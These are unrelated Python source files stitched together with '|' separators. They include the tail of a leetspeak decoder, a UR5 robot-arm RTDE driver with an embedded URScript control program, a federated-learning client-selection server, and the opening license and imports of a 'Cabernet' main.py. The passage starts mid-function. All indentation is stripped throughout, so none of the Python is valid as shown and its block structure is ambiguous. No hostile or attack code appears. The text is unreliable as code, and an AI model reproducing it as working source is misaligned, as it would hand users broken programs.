passon.pop(0)
if len(array) > 0:
for let in array[0]:
letters=copy.copy(previous)
letters.append(let)
if len(passon) > 0:
words+=self.rec_scan_array(passon,letters)
if len(array) == 1:
words.append("".join(letters))
del letters
del passon
return words
def ConvertFromLeet(self,text):
"""
Convert leet to readable English text. Find all possible words, check which are English, check for misspellings, etc.
Uses self.processes, so when creating the LeetSpeak() object, you can specify the number of threads to use: l=LeetSpeak(threads=3)
"""
#figure out how many words each thread should work on
split=text.split(" ")
thread_count={}
thread_words={}
thread_num=1
for word in split:
#add word to the array for the current thread
if thread_num in thread_count:
thread_count[thread_num]+=1
else:
thread_count[thread_num]=1
thread_words[thread_num]=[]
#up the thread_num unless it is currently at the number of threads we want, then set it to 1 to start over again
if self.processes > thread_num:
thread_num+=1
else:
thread_num=1
#compute what words each thread should decode
for num,word in enumerate(split):
for thread,words in thread_words.items():
if len(words) < thread_count[thread]:
thread_words[thread].append(word)
break
#INFORMATION:
#if self.processes = 3 and text = "cows are cool or not", thread_words={1: ['cows', 'are'], 2: ['cool', 'or'], 3: ['not']}
#create the processes
threads={}
num_threads=len(thread_words)
result_english=""
thread_results={}
receive_pipe,send_pipe=Pipe()
for i in range(self.processes):
if num_threads >= i+1:
threads[i]=Process(target=self.ConvertFromLeet_thread,args=(thread_words[i+1],i,send_pipe))
threads[i].start()
#start and wait for threads
for i in range(self.processes):
if num_threads >= i+1:
threads[i].join()
result=receive_pipe.recv()
thread_results[result[0]]=result[1]
#close the pipe
send_pipe.close()
#sort the results
thread_results=sorted(thread_results.items())
#make a string out of the results
for thread,string in thread_results:
result_english+=string+" "
return result_english.strip()
def ConvertFromLeet_thread(self,text,thread_id,pipe):
"""
The function that ConvertFromLeet() calls for each thread.
"""
english=[]
#convert each word
for word in text:
#get all the character locations less than 8 (e.g. "c,ow", "co,w", and "cow" for "cow")
#this uses some recursive substringing
possibilities=self.rec_parse(word.lower())
#append the actual "word" if it is less than 8 characters, since it might be a single letter (e.g. "n" for "and")
if len(word) <= 8:
possibilities.append([word.lower()])
#calculate what this could be in leet (if it can be anything)
validwords=[]
for possibility in possibilities:
letters=[]
valid=1
for char in possibility:
chars=[]
for let,val in self.alphabet.items():
if char in val:
chars.append(let)
if len(chars) == 0:
valid=0
break
else:
letters.append(chars)
del chars
if valid==1 and len(letters) > 0:
#generate possible words from given letters
words=self.rec_scan_array(letters)
validwords+=words
del words
#print(validwords)
#check which valid words are english if there's more than one option
#go with the most frequently used english word
if len(validwords) > 0:
englishwords={}
for valid in validwords:
score=1+5/len(valid)
#computer talk
if self.jargon.Contains(valid) == True:
value=2
jargon=self.jargon.Translate(valid)
if self.dictionary.Contains(jargon) == True:
value=4
score+=value
if len(jargon) > 0:
if jargon in englishwords:
englishwords[jargon]+=value
else:
englishwords[jargon]=score
score=0
#valid english
if len(valid) > 1 and self.dictionary.Contains(valid) == True:
score+=5
#frequency words
if self.stopwords.Contains(valid):
score+=self.spelling.Frequency(valid)
else:
score+=5*self.spelling.Frequency(valid)
#same length
if len(word) == len(valid):
score+=0.1
#no numbers
if valid.isalpha() == True:
score+=1
englishwords[valid]=score
#figure out what word is the most likely to be correctable
check=[]
skip=0
for valid in englishwords:
if valid.isalpha():
#if there is already a good word in the list, then don't bother with looking up spell corrections
if self.dictionary.Contains(valid) and len(valid) >= len(word)/2:
skip=1
check=[]
break
else:
check.append(valid)
if len(check)==0 and skip == 0:
check.append(englishwords[0])
#append the corrected version, hopefully
for item in check:
corrected=self.spelling.Check(item,dictionary=True,fast=True)
if corrected != False and len(corrected) > 0:
word=corrected[0]
if word not in englishwords:
frequency=self.spelling.Frequency(word)
#if it is on the stop list, don't add as much weight
if self.stopwords.Contains(word):
value=frequency+1
else:
value=5*frequency+1
#add weight if in the dictionary
if self.dictionary.Contains(word) == True:
value+=1
#add weight if not numbers
if word.isalpha() == True:
value+=1
englishwords[word]=value
else:
#if one of the corrected words list is in the englishwords list then up that value by 0.1
for correct in corrected:
if correct in englishwords:
englishwords[correct]+=0.1
#get the most likely word
final=sorted(englishwords.items(),key=operator.itemgetter(1),reverse=True)[0]
#add word
english.append(final[0])
#send the result
pipe.send([thread_id," ".join(english)])
|
ur5_driver.py
|
#!/usr/bin/python3
#This file also contains functionalities to control the gripper. This builds upon python-urx.
import logging
import multiprocessing as mp
import signal
import socket
import time
from copy import copy, deepcopy
import numpy as np
from klampt.math import vectorops
from scipy import signal as scipysignal
import rtde
import ur5_constants
from utils import in_limits
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
# NOTE: SETPOINT_NONE is special. It will never be passed to UR, indicates failure
SETPOINT_NONE = 0
SETPOINT_HALT = 1
SETPOINT_POSITION = 2
SETPOINT_VELOCITY = 3
SETPOINT_WRENCH = 4
SET_FREE_DRIVE = 5
# Integer registers
REG_SETPOINT = 0
REG_TYPE = 1
REG_FREE_DRIVE_ACTIVE = 3
REG_COMPLIANCE = 4
REG_ZERO_FTSENSOR = 10
# Double input registers
REG_TARGET = 0
REG_ACCELERATION = 6
REG_LOOKAHEAD = 7
REG_DAMPING = 7
REG_GAIN = 8
REG_G = 9
REG_LIMITS = 12
REG_FORCE_TARGET = 12
REG_TASK_FRAME = 18
# Double output registers
REG_JOINT_TORQUE = 0 # 0-5
class UR5RTDEDriver:
def __init__(self, host, IO_buffer, filter_flag, qmin, qmax, vmin, vmax, dashboard_client, **kwargs):
"""
An interface to the UR5 using the UR Real Time Data Exchange (RTDE) protocol.
Parameters:
host: The UR5 controller IP address
IO_buffer: Shared memory data structure for going between here and limbController.
filter_flag: Whether the wrench should be filtered.
qmin: Software joint position limit (min).
qmax: Software joint position limit (max).
vmin: Software joint velocity limit (min).
vmax: Software joint velocity limit (max).
dashboard_client: Dashboard client for communicating with the UR (for resetting protective
stops right now, nothing else). Instance of Motion.ur5dashboard.UR5DashboardClient.
Keyword arguments:
rtde_port: port for RTDE, default 30004
command_port: port for commands, default 30002
"""
self.dashboard_client = dashboard_client
self.qmin = qmin
self.qmax = qmax
self.vmin = vmin
self.vmax = vmax
self._robot_host = host
self._rtde_port = kwargs.pop('rtde_port', 30004)
self._command_port = kwargs.pop('command_port', 30002)
self._gripper = kwargs.pop('gripper', False)
self._speed_scale = None
self._cog = kwargs.pop('cog', [0.0,0.0,0.0])
self._payload = kwargs.pop('payload', 0.0)
self._gravity = kwargs.pop('gravity', [0, 0, 9.82])
self._version = None
self.IO_buffer = IO_buffer
self._start_time = None
self.last_t = 0
#stuff needed for threading
self._conn = None
self._max_speed_scale = None
self._sock = None
self.IO_buffer['running'] = 0
# Configuration that is guaranteed to be in the defined joint limits.
self._safe_config = None
self.c = np.array([10, 10, 10, 7.5, 7.5, 7.5])
self._filter_flag = filter_flag
if self._filter_flag:
self._filtered_wrench = []
self.histories = [list() for i in range(6)]
self._history_length = 25
## filter parameters
Wn=0.1
[self.b2,self.a2]=scipysignal.butter(3,Wn,'lowpass')
[self.b,self.a]=scipysignal.butter(3,(0.03, 0.06),'bandstop')
self.accum_current = np.zeros(6)
def start(self):
"""
Start ur5 controller in a subprocess.
"""
control_process = mp.Process(target = self._start, args = [])
control_process.start()
def _start(self):
# initialize RTDE
"""
General purpose registers (input):
Integer: (0-23)
0: setpoint_id
1: target_type (control mode)
2: [UNUSED]
3: free_drive_active (freedrive mode)
4-9: compliance (for force control)
10-23: [UNUSED] (??? maybe some gripper stuff idrk)
Double: (0-23)
0-5: target (target configuration, velocity, etc)
6: acceleration (of base joint, for speedj)
7 (1): lookahead (for Model Predictive Control, servoj)
7 (2): damping (for force control)
8: gain (proportional gain for MPC)
9-11: gravity vector
# 12-17: limits (for force control) (CURRENTLY DO NOT USE. HARDCODED)
12-17: target_velocity (for force control)
18-23: task_frame (for force control)
For info on special input registers see:
https://www.universal-robots.com/articles/ur/interface-communication/real-time-data-exchange-rtde-guide/
"""
try:
self._conn = rtde.RTDE(self._robot_host, self._rtde_port)
self._conn.connect()
self._version = self._conn.get_controller_version()
# configure outputs (URControl -> Python)
self._conn.send_output_setup(['timestamp', 'target_q', 'actual_q', 'target_qd',
'actual_qd', 'target_qdd', 'target_moment', 'target_speed_fraction',
'actual_TCP_force', 'actual_current', 'target_current',
'safety_status_bits','robot_status_bits','safety_mode', 'robot_mode']
+ ['output_double_register_{}'.format(i) for i in range(6)],
frequency=250)
# configure inputs (Python -> URControl)
input_names = (['input_int_register_{}'.format(i) for i in range(24)]
+ ['input_double_register_{}'.format(i) for i in range(24)]
+ ['speed_slider_mask', 'speed_slider_fraction'])
self.registers = self._conn.send_input_setup(input_names,
['INT32']*24 + ['DOUBLE']*24 + ['UINT32', 'DOUBLE'])
for name in input_names:
self.registers.__dict__[name] = 0
# start RTDE
self._conn.send_start()
# start the controller program
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.connect((self._robot_host, self._command_port))
self._program = CONTROLLER_PROGRAM.format(cog = self._cog,
payload = self._payload,
gravity = self._gravity,
gripper_flag = self._gripper,
setpoint_none = SETPOINT_NONE,
setpoint_halt = SETPOINT_HALT,
setpoint_position = SETPOINT_POSITION,
setpoint_velocity = SETPOINT_VELOCITY,
setpoint_wrench = SETPOINT_WRENCH,
set_free_drive = SET_FREE_DRIVE,
reg_setpoint = REG_SETPOINT,
reg_type = REG_TYPE,
reg_free_drive_active = REG_FREE_DRIVE_ACTIVE,
reg_compliance = REG_COMPLIANCE,
reg_zero_ftsensor = REG_ZERO_FTSENSOR,
reg_target = REG_TARGET,
reg_acceleration = REG_ACCELERATION,
reg_lookahead = REG_LOOKAHEAD,
reg_damping = REG_DAMPING,
reg_gain = REG_GAIN,
reg_g = REG_G,
reg_limits = REG_LIMITS,
reg_force_target = REG_FORCE_TARGET,
reg_task_frame = REG_TASK_FRAME,
reg_joint_torque = REG_JOINT_TORQUE)
#logger.info('controller program:\n{}'.format(self._program))
self._sock.sendall(self._program.encode('ascii') + b'\n')
self._max_speed_scale = None
self.state = None
self.controlLoop()
finally:
pass
def resend_program(self):
self._sock.sendall(self._program.encode('ascii') + b'\n')
def controlLoop(self):
# NOTE: IGNORE SIGINT!
signal.signal(signal.SIGINT, lambda signal, frame: None)
setpoint_number = 0
self.IO_buffer.lock()
self.IO_buffer.set('running', 1)
self.IO_buffer.unlock()
while True:
t1 = time.time()
state = self._conn.receive()
terr = time.time() - t1
if terr > 0.05:
print("TIMEOUT EXCEEDED {}".format(terr))
print(self.get_input_register(REG_TYPE, 'int'))
if self.state is None and state is None:
time.sleep(0.01)
continue
self.IO_buffer.lock()
stop = self.IO_buffer.get('stop_flag')
self.IO_buffer.unlock()
if stop <= 0:
self._sock.sendall(b'stop program\n')
self._sock.close()
self._sock = None
self._conn.send_pause()
self._conn.disconnect()
self._conn = None
print("disconnecting")
break
else:
self.IO_buffer.lock()
self.IO_buffer.set('stop_flag', stop - 1)
self.IO_buffer.unlock()
if state is not None:
# TODO: estimate state in the case of no sensor feedback
self.state = state
# honor speed scaling set when program started
if self._max_speed_scale is None:
self._max_speed_scale = self.state.target_speed_fraction
self._speed_scale = self.state.target_speed_fraction
# kick watchdog
setpoint_number += 1
self.set_register(REG_SETPOINT, setpoint_number, 'int')
# invoke update
self._update(self.state)
#if this loop exits, disconnect
def setHalt(self):
"""
Stop motion of the UR5.
"""
self.set_register(REG_TYPE, SETPOINT_HALT, 'int')
def setFreedriveMode(self, freedrive_mode):
"""
Enables or disables freedrive on the UR5.
Parameters:
freedrive_mode: Truthy value to enable freedrive, else dissables.
"""
if freedrive_mode:
freedrive_mode = 1
else:
freedrive_mode = 0
self.set_register(REG_TYPE, SET_FREE_DRIVE, 'int')
self.set_register(REG_FREE_DRIVE_ACTIVE, freedrive_mode, 'int')
def setPosition(self, q, lookahead=0.1, gain=400):
"""
Set the UR5 to move in position mode to the specified position.
Wraps an eventual `servoj` call.
Parameters:
q: Target joint config.
lookahead: Parameter used for smoothing the path.
Higher = more smoothing (range 0.03 to 0.2, default 0.1)
gain: Proportional gain for following the target.
Higher = faster response (range 100 to 2000, default 300).
Note: High gain with low lookahead may result in instability!
"""
self.set_register(REG_TYPE, SETPOINT_POSITION, 'int')
self.set_register(REG_GAIN, gain, 'double')
self.set_register(REG_LOOKAHEAD, lookahead, 'double')
self.l2r(q, REG_TARGET)
def setVelocity(self, qd, qdd_base=10):
"""
Set the UR5 to move in velocity mode to the specified velocity.
Wraps an eventual `speedj` call.
Parameters:
qd: Target joint velocities.
qdd_base: Acceleration of the base link, rad/s^2.
"""
self.set_register(REG_TYPE, SETPOINT_VELOCITY, 'int')
self.set_register(REG_ACCELERATION, qdd_base, 'double')
self.l2r(qd, REG_TARGET)
def setWrench(self, target, wrench, damping=0.5, task_frame=[0, 0, 0, 0, 0, 0],
compliance=[1, 1, 1, 1, 1, 1]):
"""
Set the UR5 to perform a motion in force mode.
Wraps a force_mode call.
Parameters:
target: Target joint angles to drive to.
wrench: Target wrench in the task frame.
damping: How damped the robot motion will be I guess. Exactly how this works
was not specified but it is a number from 0 to 1.
Default: 0.5
task_frame: Reference frame in which the wrench and compliance are expressed.
Relative to the robot base frame.
Order: [X, Y, Z, AX, AY, AZ] (translation, concat with axis-angle orientation.)
Default: [0, 0, 0, 0, 0, 0] (same as robot base frame).
compliance: Degrees of freedom that will be compliant in the end effector.
An array of six values (0 or 1, 1 for compliant).
Order: [X, Y, Z, RX, RY, RZ].
Default: [1, 1, 1, 1, 1, 1] (All dofs compliant).
limits: For compliant DOF: Velocity limits (m/s, rad/s).
For non compliant DOF: Displacement limits (m, rad).
"""
self.set_register(REG_TYPE, SETPOINT_WRENCH, 'int')
self.l2r(wrench, REG_TARGET)
self.l2r(task_frame, REG_TASK_FRAME)
self.l2r(compliance, REG_COMPLIANCE, "int")
#l2r(limits, self.limits_reg, REG_LIMITS)
self.l2r(target, REG_FORCE_TARGET)
self.set_register(REG_DAMPING, damping, 'double')
#this function is not used
#speed_scale set on teaching pendant directly
def speed_scale(self, s=None):
if s is not None:
self._speed_scale = s
return self._speed_scale
def _update(self, state):
buf = self.IO_buffer
if self._start_time is None:
self._start_time = state.timestamp
t = state.timestamp - self._start_time
dt = t - self.last_t
self.last_t = t
buf.lock()
buf.copy_from_object(state)
pstop = False
if state.safety_status_bits & ur5_constants.PROTECTIVE_STOP_MASK:
buf.unlock()
print("Arm has been protective stopped. Resetting in 6s...")
time.sleep(6.0)
for i in range(5):
try:
self.dashboard_client.unlockProtectiveStop()
break
except:
time.sleep(1)
print("Could not unlock... retry")
continue
print("Resending URScript...")
self.resend_program()
state = self._conn.receive()
self.state = state
if state is None:
return
buf.lock()
buf.copy_from_object(state)
pstop = True
# self.left_limb.controller.setFreeDrive(True)
# print("Entering freedrive. You have 15 seconds until it is disabled.")
# time.sleep(15.0)
# self.left_limb.controller.setFreeDrive(False)
# print("Exiting freedrive and protective stop procedure...")
buf.set("connected", 1)
joint_torques = [self.get_output_register(state, REG_JOINT_TORQUE + i) for i in range(6)]
buf.set("joint_torques", joint_torques)
if self._safe_config is None:
self._safe_config = state.actual_q
target_current = buf.get('target_current')
target_torque = buf.get('target_moment')
c = [a/b if b != 0 else 0 for a, b in zip(target_torque, target_current)]
for i, cv in enumerate(c):
if cv > 6 and cv < 12:
self.c[i] = self.c[i]*0.9 + cv*0.1
current_error = self.c * (np.array(target_current) - buf.get('actual_current'))
self.accum_current = 0.96*self.accum_current + 0.04*current_error
buf.set('current_error', self.accum_current)
#Add and filter wrench here
if self._filter_flag:
wrench = buf.get('actual_TCP_force')
dat = wrench
if len(self.histories[0]) < self._history_length:
for i, x in enumerate(self.histories):
x.append(dat[i])
buf.set('filtered_wrench', wrench)
else:
#filtering all 6 of these takes about 0.1 ms
_filtered_dat = [0.0]*6
for i, x in enumerate(self.histories):
assert len(x) == self._history_length
x.pop(0)
x.append(dat[i])
_filtered_dat[i] = scipysignal.filtfilt(self.b, self.a, x)[self._history_length -1].tolist()
buf.set('filtered_wrench', _filtered_dat[:6])
if pstop:
self.setPosition(self._safe_config, 0.2, 100)
buf.unlock()
self._conn.send(self.registers)
return
if buf.get('zero_ftsensor'):
self.set_register(REG_ZERO_FTSENSOR, 1, regtype="int")
buf.set('zero_ftsensor', 0)
else:
self.set_register(REG_ZERO_FTSENSOR, 0, regtype="int")
if buf.get('use_soft_limit'):
# TODO: velocity
qmin = self.qmin
qmax = self.qmax
else:
qmin = ur5_constants.MIN_JOINTS
qmax = ur5_constants.MAX_JOINTS
stop_robot = False
control_mode = buf.get('control_mode')
if control_mode == SETPOINT_NONE:
#if no commands are set, go to the current position
stop_robot = True
elif control_mode == SETPOINT_HALT:
self.setHalt()
elif control_mode == SETPOINT_POSITION:
q_commanded = buf.get('q_commanded')
if self.isFormatted(q_commanded):
if not in_limits(q_commanded, qmin, qmax):
buf.set('control_mode', SETPOINT_NONE)
stop_robot = True
else:
lookahead = buf.get("lookahead")
delta = np.array(q_commanded) - state.actual_q
qd_limit = 3 * lookahead
max_qd = np.max(np.abs(delta))
if max_qd > qd_limit:
delta = delta * qd_limit / max_qd
self.setPosition(state.actual_q + delta, lookahead)
else:
buf.set('control_mode', SETPOINT_NONE)
stop_robot = True
print(q_commanded)
print("Warning, improper position formatting. Halting")
elif control_mode == SETPOINT_VELOCITY:
qdot_commanded = buf.get('qdot_commanded')
if self.isFormatted(qdot_commanded):
if in_limits(qdot_commanded, self.vmin, self.vmax):
q_next = vectorops.madd(state.actual_q, qdot_commanded, dt)
#commanded velocity is rad/s
#only want to check next position limits of robot not gripper
#UR5_CL is the configuration length of just the UR5 robot = 6
if not in_limits(q_next, qmin, qmax):
buf.set('control_mode', SETPOINT_NONE)
stop_robot = True
print("Warning, exceeding joint limits. Halting")
else:
self.setVelocity(qdot_commanded)
else:
buf.set('control_mode', SETPOINT_NONE)
stop_robot = True
print("Warning, improper velocity formatting. Halting")
elif control_mode == SETPOINT_WRENCH:
q_commanded = buf.get('q_commanded')
wrench_commanded = buf.get('wrench_commanded')
if not in_limits(q_commanded, qmin, qmax):
stop_robot = True
print("Warning, exceeding joint limits. Halting")
else:
damping_commanded = buf.get('damping_commanded')
task_frame = buf.get('task_frame')
self.setWrench(q_commanded, wrench_commanded, damping_commanded, task_frame)
elif control_mode == SET_FREE_DRIVE:
self.setFreedriveMode(buf.get('free_drive_commanded'))
#print(pinchness(state.actual_q))
if not in_limits(state.actual_q, qmin, qmax):
stop_robot = True
#if in_pinch(state.actual_q, pinch_radius = 0.12):
# stop_robot = True
if not stop_robot:
self._safe_config = state.actual_q
# NOTE: slightly jank. but whatever man
if stop_robot:
self.setPosition(self._safe_config, 0.2, 100)
self.setGravity(buf.get('gravity'))
# clamp speed scale
self._speed_scale = max(min(self._speed_scale, self._max_speed_scale), 0)
self.registers.speed_slider_mask = 1
self.registers.speed_slider_fraction = self._speed_scale
# send gravity
self.l2r(self._gravity, REG_G, "double", 3)
buf.unlock()
self._conn.send(self.registers)
def isFormatted(self, val):
#do formatting
if val:
if len(val) == ur5_constants.UR5_CONFIG_LEN:
return True
else:
print("Error, val: ", val, " is not formatted correctly")
return False
def setGravity(self,g):
self._gravity = deepcopy(g)
@property
def version(self):
return self._version
########################################
# Some utility functions
########################################
def r2l(self, base=0, regtype="double", n=6):
"""
Convert consecutive register values to a list.
Parameters:
base: Index to start from (inclusive)
Return:
List of 6 values read from the register.
"""
ret = []
for i in range(n):
ret.append(self.registers.__dict__['input_{}_register_{}'.format(regtype, base + i)])
return ret
def l2r(self, input_list, base=0, regtype="double", n=6):
"""
Write values in a list to consecutive registers.
Parameters:
input_list: List to read from.
base: Index to start from (inclusive)
Return:
"""
for i in range (n):
self.registers.__dict__['input_{}_register_{}'.format(regtype, base + i)] = input_list[i]
def set_register(self, regnum, value, regtype="double"):
"""
Set a value in a register.
Parameters:
TODO
"""
self.registers.__dict__['input_{}_register_{}'.format(regtype, regnum)] = value
def get_input_register(self, regnum, regtype="double"):
"""
Get a value in an input register.
Parameters:
TODO
Return:
The value.
"""
return self.registers.__dict__['input_{}_register_{}'.format(regtype, regnum)]
def get_output_register(self, registers, regnum, regtype="double"):
"""
Get a value in an output register.
Parameters:
TODO
Return:
The value.
"""
return registers.__dict__['output_{}_register_{}'.format(regtype, regnum)]
#RTDE script sent to UR5
CONTROLLER_PROGRAM = '''
stop program
socket_send_string("close popup", "internal")
socket_send_byte(10, "internal")
def rtde_control_loop():
# Tare the FT sensor
zero_ftsensor()
# constants
SETPOINT_TIMEOUT = 125
SETPOINT_NONE = {setpoint_none}
SETPOINT_HALT = {setpoint_halt}
SETPOINT_POSITION = {setpoint_position}
SETPOINT_VELOCITY = {setpoint_velocity}
SET_FREE_DRIVE = {set_free_drive}
SETPOINT_WRENCH = {setpoint_wrench}
CONTROL_PERIOD = 0.004
RTDE_WATCHDOG_FREQUENCY = 1
# robotiq gripper
GRIPPER_FLAG = {gripper_flag}
# integer registers
REG_SETPOINT = {reg_setpoint}
REG_TYPE = {reg_type}
REG_FREE_DRIVE_ACTIVE = {reg_free_drive_active}
REG_COMPLIANCE = {reg_compliance}
REG_ZERO_FTSENSOR = {reg_zero_ftsensor}
# input double registers
REG_TARGET = {reg_target}
REG_ACCELERATION = {reg_acceleration}
REG_LOOKAHEAD = {reg_lookahead}
REG_DAMPING = {reg_damping}
REG_GAIN = {reg_gain}
REG_G = {reg_g}
REG_LIMITS = {reg_limits}
REG_FORCE_TARGET = {reg_force_target}
REG_TASK_FRAME = {reg_task_frame}
# output double registers
REG_JOINT_TORQUE = {reg_joint_torque}
# I/O configuration
set_standard_analog_input_domain(0, 1)
set_standard_analog_input_domain(1, 1)
set_tool_analog_input_domain(0, 1)
set_tool_analog_input_domain(1, 1)
set_analog_outputdomain(0, 0)
set_analog_outputdomain(1, 0)
set_input_actions_to_default()
if GRIPPER_FLAG:
set_tool_voltage(24)
set_tool_communication(True,115200,0,1,1.5,3.5)
else:
set_tool_voltage(0)
end
# tool configuration
set_payload_cog([{cog[0]}, {cog[1]}, {cog[2]}])
set_payload({payload})
set_gravity([{gravity[0]}, {gravity[1]}, {gravity[2]}])
setpoint_number = read_input_integer_register(REG_SETPOINT)
last_setpoint_number = setpoint_number
missed_setpoints = 0
# WHAT IS THIS FOR?
rtde_set_watchdog("input_int_register_0", RTDE_WATCHDOG_FREQUENCY, "stop")
in_force_mode = 0
tick_num = 0
while True:
setpoint_number = read_input_integer_register(REG_SETPOINT)
if setpoint_number == last_setpoint_number:
missed_setpoints = missed_setpoints + 1
else:
missed_setpoints = 0
end
tick_num = tick_num + 1
last_setpoint_number = setpoint_number
if missed_setpoints >= SETPOINT_TIMEOUT:
popup("setpoint timeout", title="PyUniversalRobot", error=True)
halt
end
should_zero = read_input_integer_register(REG_ZERO_FTSENSOR)
if should_zero == 1:
zero_ftsensor()
end
# update the setpoint
write_output_integer_register(0, setpoint_number)
joint_torques = get_joint_torques()
write_output_float_register(REG_JOINT_TORQUE + 0, joint_torques[0])
write_output_float_register(REG_JOINT_TORQUE + 1, joint_torques[1])
write_output_float_register(REG_JOINT_TORQUE + 2, joint_torques[2])
write_output_float_register(REG_JOINT_TORQUE + 3, joint_torques[3])
write_output_float_register(REG_JOINT_TORQUE + 4, joint_torques[4])
write_output_float_register(REG_JOINT_TORQUE + 5, joint_torques[5])
target = [0, 0, 0, 0, 0, 0]
target[0] = read_input_float_register(REG_TARGET + 0)
target[1] = read_input_float_register(REG_TARGET + 1)
target[2] = read_input_float_register(REG_TARGET + 2)
target[3] = read_input_float_register(REG_TARGET + 3)
target[4] = read_input_float_register(REG_TARGET + 4)
target[5] = read_input_float_register(REG_TARGET + 5)
G = [0,0,0]
G[0] = read_input_float_register(REG_G + 0)
G[1] = read_input_float_register(REG_G + 1)
G[2] = read_input_float_register(REG_G + 2)
set_gravity(G)
type = read_input_integer_register(REG_TYPE)
if type == SETPOINT_WRENCH:
if tick_num % 5 == 1:
force_mode_set_gain_scaling(2.0)
damping = read_input_float_register(REG_DAMPING)
force_mode_set_damping(damping)
# TODO: Write a helper?
compliance = [0, 0, 0, 0, 0, 0]
compliance[0] = read_input_integer_register(REG_COMPLIANCE + 0)
compliance[1] = read_input_integer_register(REG_COMPLIANCE + 1)
compliance[2] = read_input_integer_register(REG_COMPLIANCE + 2)
compliance[3] = read_input_integer_register(REG_COMPLIANCE + 3)
compliance[4] = read_input_integer_register(REG_COMPLIANCE + 4)
compliance[5] = read_input_integer_register(REG_COMPLIANCE + 5)
task_frame = p[0, 0, 0, 0, 0, 0]
task_frame[0] = read_input_float_register(REG_TASK_FRAME + 0)
task_frame[1] = read_input_float_register(REG_TASK_FRAME + 1)
task_frame[2] = read_input_float_register(REG_TASK_FRAME + 2)
task_frame[3] = read_input_float_register(REG_TASK_FRAME + 3)
task_frame[4] = read_input_float_register(REG_TASK_FRAME + 4)
task_frame[5] = read_input_float_register(REG_TASK_FRAME + 5)
# hardcoded for now...
limits = [5, 5, 5, 5, 5, 5]
# limits[0] = read_input_float_register(REG_LIMITS + 0)
# limits[1] = read_input_float_register(REG_LIMITS + 1)
# limits[2] = read_input_float_register(REG_LIMITS + 2)
# limits[3] = read_input_float_register(REG_LIMITS + 3)
# limits[4] = read_input_float_register(REG_LIMITS + 4)
# limits[5] = read_input_float_register(REG_LIMITS + 5)
force_mode(task_frame, compliance, target, 2, limits)
in_force_mode = 1
end
if in_force_mode == 1:
target_pos = [0, 0, 0, 0, 0, 0]
target_pos[0] = read_input_float_register(REG_FORCE_TARGET + 0)
target_pos[1] = read_input_float_register(REG_FORCE_TARGET + 1)
target_pos[2] = read_input_float_register(REG_FORCE_TARGET + 2)
target_pos[3] = read_input_float_register(REG_FORCE_TARGET + 3)
target_pos[4] = read_input_float_register(REG_FORCE_TARGET + 4)
target_pos[5] = read_input_float_register(REG_FORCE_TARGET + 5)
# hardcoded for now...
lookahead = 0.02
gain = 300
acceleration = 10
#speedj(target_pos, acceleration, CONTROL_PERIOD)
servoj(target_pos, 0, 0, CONTROL_PERIOD, lookahead, gain)
end
elif in_force_mode == 1:
in_force_mode = 0
end_force_mode()
end
if type == SETPOINT_WRENCH:
do_nothing = 0
elif type == SET_FREE_DRIVE:
free_drive_active = read_input_integer_register(REG_FREE_DRIVE_ACTIVE)
if free_drive_active == 1:
freedrive_mode()
else:
end_freedrive_mode()
end
elif type == SETPOINT_HALT:
# issue command
popup("halt command issued", title="PyUniversalRobot", error=True)
halt
elif type == SETPOINT_POSITION:
# read lookahead and gain parameters
lookahead = read_input_float_register(REG_LOOKAHEAD)
if lookahead > 0.2:
# In case we transitioned partially from force mode to position mode
lookahead = 0.2
end
gain = read_input_float_register(REG_GAIN)
# issue command
# NOTE: acceleration and velocity arguments are ignored
servoj(target, 0, 0, CONTROL_PERIOD, lookahead, gain)
elif type == SETPOINT_VELOCITY:
# read acceleration parameter
acceleration = read_input_float_register(REG_ACCELERATION)
# issue command
speedj(target, acceleration, CONTROL_PERIOD)
else:
# alert and quit
popup("unknown setpoint type received", title="PyUniversalRobot", error=True)
halt
end
end
end
'''
|
directed.py
|
import logging
from server import Server
import numpy as np
from threading import Thread
class DirectedServer(Server):
"""Federated learning server that uses profiles to direct during selection."""
# Run federated learning
def run(self):
# Perform profiling on all clients
self.profiling()
# Continue federated learning
super().run()
# Federated learning phases
def selection(self):
import fl_model # pylint: disable=import-error
clients = self.clients
clients_per_round = self.config.clients.per_round
profiles = self.profiles
w_previous = self.w_previous
# Extract directors from profiles
directors = [d for _, d in profiles]
# Extract most recent model weights
w_current = self.flatten_weights(fl_model.extract_weights(self.model))
model_direction = w_current - w_previous
# Normalize model direction
model_direction = model_direction / \
np.sqrt(np.dot(model_direction, model_direction))
# Update previous model weights
self.w_previous = w_current
# Generate client director scores (closer direction is better)
scores = [np.dot(director, model_direction) for director in directors]
# Apply punishment for repeatedly selected clients
p = self.punishment
scores = [x * (0.9)**p[i] for i, x in enumerate(scores)]
# Select clients with highest scores
sample_clients_index = []
for _ in range(clients_per_round):
top_score_index = scores.index(max(scores))
sample_clients_index.append(top_score_index)
# Overwrite to avoid reselection
scores[top_score_index] = min(scores) - 1
# Extract selected sample clients
sample_clients = [clients[i] for i in sample_clients_index]
# Update punishment factors
self.punishment = [
p[i] + 1 if i in sample_clients_index else 0 for i in range(len(clients))]
return sample_clients
def profiling(self):
import fl_model # pylint: disable=import-error
# Use all clients for profiling
clients = self.clients
# Configure clients for training
self.configuration(clients)
# Train on clients to generate profile weights
threads = [Thread(target=client.train) for client in self.clients]
[t.start() for t in threads]
[t.join() for t in threads]
# Recieve client reports
reports = self.reporting(clients)
# Extract weights from reports
weights = [report.weights for report in reports]
weights = [self.flatten_weights(weight) for weight in weights]
# Extract initial model weights
w0 = self.flatten_weights(fl_model.extract_weights(self.model))
# Save as initial previous model weights
self.w_previous = w0.copy()
# Update initial model using results of profiling
# Perform weight aggregation
logging.info('Aggregating updates')
updated_weights = self.aggregation(reports)
# Load updated weights
fl_model.load_weights(self.model, updated_weights)
# Calculate direction vectors (directors)
directors = [(w - w0) for w in weights]
# Normalize directors to unit length
directors = [d / np.sqrt(np.dot(d, d)) for d in directors]
# Initialize punishment factors
self.punishment = [0 for _ in range(len(clients))]
# Use directors for client profiles
self.profiles = [(client, directors[i])
for i, client in enumerate(clients)]
return self.profiles
|
main.py
|
"""
MIT License
Copyright (C) 2021 ROCKY4546
https://github.com/rocky4546
This file is part of Cabernet
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute,
sublicense, and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
"""
import gc
import argparse
import logging
import os
import platform
import sys
import time
